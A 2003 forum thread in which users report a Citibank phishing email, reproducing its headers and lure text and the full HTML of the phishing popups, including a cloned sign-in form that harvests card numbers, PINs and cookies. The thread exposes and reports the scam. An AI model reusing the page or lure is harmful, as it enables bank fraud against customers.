how-to block ads
|
christos
join:2002-01-09
Bridgewater, MA
 ·Comcast Formerly ..
|  [scam] More scumbags!
It seems that there is no shortage of low life scumbags.
"You must complete this process by clicking on the link below and entering in the small window your Citibank ATM/Debit Card number and PIN that you use on ATM"
Right on! Hold your breath #$#%#$.
Reported to Citibank.
________________________________________________
Received: from compuserve.com (68-173-162-117.nyc.rr.com[68.173.162.117](untrusted sender)) by rwcrmxc14.comcast.net (rwcrmxc14) with SMTP id ; Sun, 28 Sep 2003 14:59:25 +0000
Received: from remotepoint.com [224.152.215.107] by 68-173-162-117.nyc.rr.com (Postfix) with ESMTP id E08B327B7457 for ; Sun, 28 Sep 2003 22:59:05 +0000
Date: Sun, 28 Sep 2003 22:59:05 +0000
From: Verify
Subject: Citibank E-mail Verification: XXXXXXX@attbi.com
To: XXXXX
References:
In-Reply-To:
Message-ID:
Reply-To: Verify
Sender: Verify
MIME-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 8bit
X-Mozilla-Status: 8001
X-Mozilla-Status2: 00000000
X-UIDL: 20030928145926r1400hl25ge0016ol
Dear Citibank Member,
This email was sent by the Citibank server to verify your e-mail
address. You must complete this process by clicking on the link below and entering in the small window your Citibank ATM/Debit Card number and PIN that you use on ATM.
This is done for your protection -V- becaurse some of
our members no longer have access to their email addresses and we must verify it.
To verify your e-mail address and access your bank account,
click on the link below. If nothing happens when you click on the link (or if you use AOL)0, copy and paste the link into the address bar of your web browser.
»www.citibank.com:ac=ba0LTCvkfifg···OBhOLqPz
a---------------------------------------------
Thank you for using Citibank!
t---------------------------------------------
This automatic email sent to: XXXXXX@attbi.com
Do not reply to this email.
R_CODE: 4wTnKZot3d05wP2MBnU4 | |
SYNACK
Just Firewall It
Premium,Mod
join:2001-03-05
Venice, CA
·Comcast Formerly ..
Host:
Networking
Virtual Private Ne..
Netgear
ZyXEL
| 
Popup Window 1 | | 
Popup Window 2 | |
Please go to the citibank site and report this e-mail. (They have a sample just like yours).
See attached image for popup (window 1). After entering garbage, I get Window 2!
[text was edited by author 2003-09-28 17:33:48] | |
SYNACK
Just Firewall It
Premium,Mod
join:2001-03-05
Venice, CA
·Comcast Formerly ..
Host:
Networking
Virtual Private Ne..
Netgear
ZyXEL
| HTML code window 1:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<!-- saved from url=(0074)»https://web.da-us.citibank.com/signin/ci···etup.jsp -->
<!-- BS_ID:[VisitorHomepage] - Page name:[Welcome] JSP File:[login2/user_setup.jsp] --><HTML><HEAD><TITLE>E-mail Verification</TITLE>
<!-- Meta http equivalent was here -->
<SCRIPT language=javascript src="welcome.files/sniffer.js"
type=text/javascript></SCRIPT>
<META http-equiv=Cache-Control content=no-cache>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Expires content=-1>
<SCRIPT>function setAction(act){ document.setup.action.value = act; if (onSubmit()) document.setup.submit();}var sent = 0;function onSubmit() { if (sent == 1) return false; document.setup.signin.value = document.cookie; if (!verify(document.setup.user_name.value, document.setup.password.value, document.setup.cin.value, document.setup.remember.checked)) return false; sent = 1; return true;}function verify(uid,pwd,cin,remember) { if (uid.length == 0 && cin.length == 0) { alert("Please enter an Card Number and/or a Card Nickname."); return false; } if (remember && uid.length == 0) { alert("Please enter a Card Nickname."); return false; } if (uid.length != 0 && !useridValidation(uid)) return false; if (cin.length != 0 && !cinValidation(cin)) return false; if (!passwordValidation(pwd)) return false; return true;}function useridValidation(username) { var maxlen = 15; if ((username.length < 1 || username.length > maxlen)) { alert("User Names must be 1-" + maxlen + " characters in length."); document.setup.user_name.focus(); return false; } for (var i = 0; i < username.length; i++) { if (! ((username.charAt(i) >= "a" && username.charAt(i) <= "z") || (username.charAt(i) >= "A" && username.charAt(i) <= "Z") || (username.charAt(i) >= "0" && username.charAt(i) <= "9")) ) { alert("Your Card Nickname includes an invalid character.\nCard Nicknames can include upper and lowercase letters (A-Z, a-z) and numbers (0-9).\nCard Nicknames must contain no spaces."); document.setup.user_name.focus(); return(false); } } return true;}function passwordValidation(password) { if (password.length == 0) { alert("Please enter a PIN."); document.setup.password.focus(); return false; } return true;}function cinValidation(cin) { var cinCount = 0; for (var k = 0; k < cin.length; k++) { var cinChar = cin.charAt(k); if (cinChar >= "0" && cinChar <= "9") { cinCount++; } else { alert("Card Number must be only digits (0-9), no spaces."); document.setup.cin.focus(); return false; } } if (cin != "" && cinCount < 14) { alert("Card Number must be at least 14 digits."); document.setup.cin.focus(); return false; } return true;}</SCRIPT>
<STYLE type=text/css>.cin {
FONT-SIZE: 10pt; FONT-FAMILY: arial, helvetica, verdana, "sans serif"
}
#cin {
WIDTH: 178px; FONT-FAMILY: arial, helvetica, verdana, "sans serif"
}
.password {
FONT-SIZE: 10pt; FONT-FAMILY: arial, helvetica, verdana, sans-serif
}
#password {
WIDTH: 178px; FONT-FAMILY: arial, helvetica, verdana, sans-serif
}
.user_name {
FONT-SIZE: 10pt; FONT-FAMILY: arial, helvetica, verdana, sans-serif
}
#user_name {
WIDTH: 178px; FONT-FAMILY: arial, helvetica, verdana, sans-serif
}
</STYLE>
<SCRIPT>var _pid="VisitorHomepage";var _u="visitor";var _f="NO";var _sid="MyCiti";var _ssid=1;var _pn='Welcome';var _bd='<!--BOTTOMDISCLAIMER--><table border=0 cellspacing=0 cellpadding=0><tr><td colspan=2 valign="top"><SUP>1</SUP>Forbes chose Citibank® Online as its favorite online banking site in its Winter 2002 Best of The Web issue. <sub> </sub><sub> </sub></td><td rowspan=3 align=right><img height=1 width=50 src=https://web.da-us.citibank.com/images/pixel.gif><a href="javascript:launchPopup(\'»https://digitalid.verisign.com/as2/1d131···ight=450 \')"><img border="0" alt="protected by verisign" src="https://web.da-us.citibank.com/images/verisign.gif"></a></td></tr><tr><td valign=top nowrap><br>My Citi gives you access to accounts and services provided by Citibank and its affiliates.<br>Citibank, N.A., Citibank, F.S.B., Citibank (West), FSB. Member FDIC.</td><td width=100%><img src="https://web.da-us.citibank.com/popups/images/lender.gif" width=48 height=51 alt="An Equal Housing Lender" border=0 hspace=6 vspace=2></td></tr></table><!--/BOTTOMDISCLAIMER-->';var _c="http://www.citi.com";var _d="https://web.da-us.citibank.com";var _a="citifi";</SCRIPT>
<META content="MSHTML 6.00.2719.2200" name=GENERATOR></HEAD>
<BODY bottomMargin=0 vLink=#003399 link=#003399 bgColor=#ffffff leftMargin=0
topMargin=0 marginwidth="0" marginheight="0"><BR>
<center>
<META http-equiv=Pragma content=no-cache>
<META http-equiv=Content-Control content=no-cache>
<META http-equiv=Expires content=0>
<FORM
action="obr.html"
method=get><INPUT type=hidden name=signin><INPUT
type=hidden value=transition3 name=flow><INPUT type=hidden value=signon
name=action><INPUT type=hidden value=https name=current_protocol>
<SCRIPT> document.write('<input type="hidden" name="screen_width" value="' + screen.width + '">'); </SCRIPT>
<TABLE cellSpacing=0 cellPadding=0 border=0>
<TBODY>
<TR>
<TD bgColor= colSpan=5><IMG
src="welcome.files/pixel.gif"></TD></TR>
<TR>
<TD width=1 bgColor=><IMG src="welcome.files/pixel.gif"></TD>
<TD><IMG height=1 src="welcome.files/pixel.gif" width=10></TD>
<TD><IMG height=10 src="welcome.files/pixel.gif" width=1><BR><IMG
src="welcome.files/so_wycbc.gif"></TD>
<TD><IMG height=1 src="welcome.files/pixel.gif" width=10></TD>
<TD width=1 bgColor=><IMG
src="welcome.files/pixel.gif"></TD></TR>
<TR>
<TD width=1 bgColor=><IMG src="welcome.files/pixel.gif"></TD>
<TD></TD>
<TD colSpan=2><B>Card #/CIN </B></TD>
<TD width=1 bgColor=><IMG
src="welcome.files/pixel.gif"></TD></TR>
<TR>
<TD width=1 bgColor=><IMG src="welcome.files/pixel.gif"></TD>
<TD><IMG height=1 src="welcome.files/pixel.gif" width=10></TD>
<TD class=cin vAlign=top height=25><INPUT id=cin maxLength=22
size=13 name=cin></TD>
<TD><IMG height=1 src="welcome.files/pixel.gif" width=10></TD>
<TD width=1 bgColor=><IMG
src="welcome.files/pixel.gif"></TD></TR>
<TR>
<TD width=1 bgColor=><IMG src="welcome.files/pixel.gif"></TD>
<TD></TD>
<TD colSpan=2><B>PIN</B></TD>
<TD width=1 bgColor=><IMG
src="welcome.files/pixel.gif"></TD></TR>
<TR>
<TD width=1 bgColor=><IMG src="welcome.files/pixel.gif"></TD>
<TD><IMG height=1 src="welcome.files/pixel.gif" width=10></TD>
<TD class=password vAlign=top height=25><INPUT id=password
type=password size=13 name=password></TD>
<TD><IMG height=1 src="welcome.files/pixel.gif" width=10></TD>
<TD width=1 bgColor=><IMG
src="welcome.files/pixel.gif"></TD></TR>
<TR>
<TD width=1 bgColor=><IMG src="welcome.files/pixel.gif"></TD>
<TD><IMG height=1 src="welcome.files/pixel.gif" width=10></TD>
<TD>
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD><IMG height=10 src="welcome.files/pixel.gif"
width=1></TD></TR>
<TR>
<TD vAlign=top></TD>
<TD align=right><INPUT type=image height=24 width=70
src="welcome.files/sgon_btn.gif" align=bottom border=0></TD></TR>
<TR>
<TD><IMG height=20 src="welcome.files/pixel.gif"
width=1></TD></TR></TBODY></TABLE></TD>
<TD><IMG height=1 src="welcome.files/pixel.gif" width=10></TD>
<TD width=1 bgColor=><IMG
src="welcome.files/pixel.gif"></TD></TR></FORM>
</TABLE>
</center>
</BODY></HTML>
</small>
HTML code window 2:
<html>
<head>
<title>Your E-Mail Was Verified.</title>
</head>
<body>
<center>
<font size=3 color=red>
<br><br><br><b>Thank you.
</font>
<font size=3>
</b><br><br><b>Your E-Mail Address Was<br>Successful Verified.</b><br>
</font>
</center>
</body>
</html>
I like the honest choice of words for the program: "sniffer.js" 
[text was edited by author 2003-09-28 17:36:31] | |
christos
join:2002-01-09
Bridgewater, MA | I reported it to Citi within 5 minutes of receiving that e-mail. Hopefully they'll shut this site soon. | |
SYNACK
Just Firewall It
Premium,Mod
join:2001-03-05
Venice, CA
·Comcast Formerly ..
Host:
Networking
Virtual Private Ne..
Netgear
ZyXEL
|  
Success! |
 | |
Sunsetstrip
Go Kings
Premium,MVM
join:2000-07-08
West Hollywood, CA
clubs:
| reply to christos
Citi Bank has had a warning on your sign in page for at least the last month warning about this and other scams.
»www.citi.com/domain/spoof/report···/web.da-
--
My Photo Gallery | |
|
